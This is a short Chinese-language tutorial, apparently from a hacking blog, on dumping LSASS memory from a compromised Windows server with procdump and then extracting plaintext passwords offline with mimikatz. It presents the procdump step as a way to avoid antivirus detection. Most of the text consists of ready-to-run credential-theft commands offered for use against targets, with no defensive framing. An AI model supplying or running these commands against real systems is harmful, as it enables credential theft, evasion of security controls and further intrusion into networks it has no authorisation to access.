当拿到目标服务器时,我们一般会使用神器mimkaz来抓取目标服务器的明文密码,但是如果目标服务器配置了waf,mimikaz无法抓取时,这是可以将存有帐号密码的dmp文件下载到本地来使用mimikaz抓取。
实现自己搭建一个与目标机器同样的系统环境。然后利用如下命令来下载dmp文件;
procdump.exe -accepteula -ma lsass.exe %COMPUTERNAME%_lsass.dmp
这个procdump.exe是微软工具包中的一个工具,不会被杀毒ban了,将该dmp下载好了之后,利用一下两条mimikaz命令,可以抓取出windows明文密码
mimikatz # sekurlsa::minidump lsass.DMP mimikatz # sekurlsa::logonPasswords full